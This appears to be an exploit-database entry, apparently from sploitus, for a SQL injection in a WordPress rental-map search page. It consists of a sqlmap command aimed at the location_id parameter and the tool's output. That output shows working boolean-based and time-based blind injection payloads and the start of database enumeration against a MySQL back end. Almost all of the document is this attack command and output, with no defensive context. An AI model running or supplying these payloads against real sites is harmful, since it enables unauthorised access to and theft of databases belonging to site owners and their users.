Share
## https://sploitus.com/exploit?id=WPEX-ID:10295
sqlmap --url="https://example.com/search-rental-full-map/?location_id=1" -dbs --random-agent --time-sec=8

[03:13:37] [INFO] resuming back-end DBMS 'mysql'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: location_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: location_id=1 OR NOT 1188=1188#

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: location_id=1 OR SLEEP(8)
---
[04:17:31] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (Percona fork)
[04:17:31] [INFO] fetching database names
[04:17:31] [INFO] fetching number of databases